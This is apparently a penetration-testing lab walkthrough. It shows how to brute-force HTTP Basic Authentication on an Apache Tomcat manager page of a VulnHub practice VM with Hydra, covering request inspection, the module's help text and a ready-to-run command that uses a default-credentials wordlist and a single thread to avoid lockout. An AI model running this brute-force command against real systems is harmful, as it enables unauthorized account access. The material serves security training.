Brute Force HTTP Basic Authentication with Hydra

Process Overview

The basic process to begin brute forcing web logins with Hydra goes like this:

1. Open your web browser
2. Navigate to the target site
3. Open the browser developer tools
   Or, configure traffic to go through a HTTP proxy (e.g. Burp Suite)
4. Make a login attempt to the target service
5. Inspect the request using the browser developer tools or proxied request
   • Note the target URL
   • Note the HTTP method
   • Note any special headers
   • Note any request body / payload
   • Note the server response for invalid logins

Brute Force Basic Authentication

Excellent overview of HTTP basic authentication: https://www.youtube.com/watch?v=rhi1eIjSbvk
Target I am using in this example: https://vulnhub.com/entry/hacksudo-101,650/

Analyzing the Application

Apache Tomcat is running on TCP/8080 on the target

• Click Manager App, prompted for login
  • Browser sends GET /manager/html HTTP/1.1
• Server responds HTTP 401
  • Includes Www-Authenticate: Basic realm="Tomcat Manager Application" header

• Browser prompts user for username and password
  

• We input the following
  • Username: tomcat
  • Password: s3cret 
  • Press Sign in
• Browser sends GET /manager/html HTTP/1.1 
  • Includes the Authorization: Basic dG9tY2F0OnMzY3JldA== header to authenticate
  • dG9tY2F0OnMzY3JldA== is tomcat:s3cret encoded to base64
• Server responds HTTP 401 due to incorrect credentials

Review of the Findings

• Note the target URL: http://10.10.99.171:8080/manager/html
  
• Note the HTTP method: HTTP GET
  
• Note any special headers: N/A, no cookies or other session data
  
• Note any request body / payload: No request body sent with HTTP GET
  
• Note the server response for invalid logins: The server responded HTTP 401

Using Findings with Hydra

Hydra http-get Module

• As noted in the test case, the client sends Authorization: Basic <base64> in a HTTP GET request
• There's no data in the request body
• Therefore, we can use the Hydra http-get module

hydra -U http-get

Show Hydra http-get module usage text

Hydra v9.5 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2023-12-14 19:15:10

Help for module http-get:
============================================================================
Module http-get requires the page to authenticate.
The following parameters are optional:
 (a|A)=auth-type   specify authentication mechanism to use: BASIC, NTLM or MD5
 (h|H)=My-Hdr\: foo   to send a user defined HTTP header with each request
 (F|S)=check for text in the HTTP reply. S= means if this text is found, a
       valid account has been found, F= means if this string is present the
       combination is invalid. Note: this must be the last option supplied.
For example:  "/secret" or "http://bla.com/foo/bar:H=Cookie\: sessid=aaaa" or "https://test.com:8080/members:A=NTLM"

Example Command

I'm using -t 1 because during testing on this target, found that the server would blacklist me for too many failed login attempts in succession. I'm not sure if it'll auto-remove after waiting, but I have the VM running in my environment, so I just rebooted it and tested again.

WORDLIST='/usr/share/seclists/Passwords/Default-Credentials/tomcat-betterdefaultpasslist.txt'
hydra -I -V -C "$WORDLIST" -t 1 "http-get://10.9.9.12:8080/manager/html:A=BASIC:F=401"

Use -C with wordlist, for a list of usernames and passwords that are "colon-delimited" -- e.g. admin:password123

There appears to be two valid logins for the Tomcat server.